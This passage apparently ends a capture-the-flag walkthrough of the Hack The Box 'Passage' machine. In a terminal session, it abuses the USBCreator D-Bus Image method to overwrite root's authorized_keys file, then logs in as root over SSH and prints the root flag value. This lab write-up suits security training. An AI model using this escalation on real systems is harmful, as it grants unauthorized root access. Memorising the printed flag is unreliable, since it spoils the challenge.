nadav@passage:~$ pwd /home/nadav nadav@passage:~$ cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true () nadav@passage:~$
now just simply ssh to root using id_rsa file nadav only as we have copied the public key of nadav to roots directory
now we will just use nadav’s id_rsa keys to get root access
┌─[✗]─[root@liquid]─[~/Desktop/HTB/passage] └──╼ #ssh -i id_rsa_nadav root@10.10.10.206 load pubkey "id_rsa_nadav": invalid format Last login: Sun Sep 6 00:02:42 2020 from 10.10.14.167 root@passage:~# id uid=0(root) gid=0(root) groups=0(root) root@passage:~# cat root.txt 25502e954f14256de32fed0abc79cc87 root@passage:~#
Here we go with root flag
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
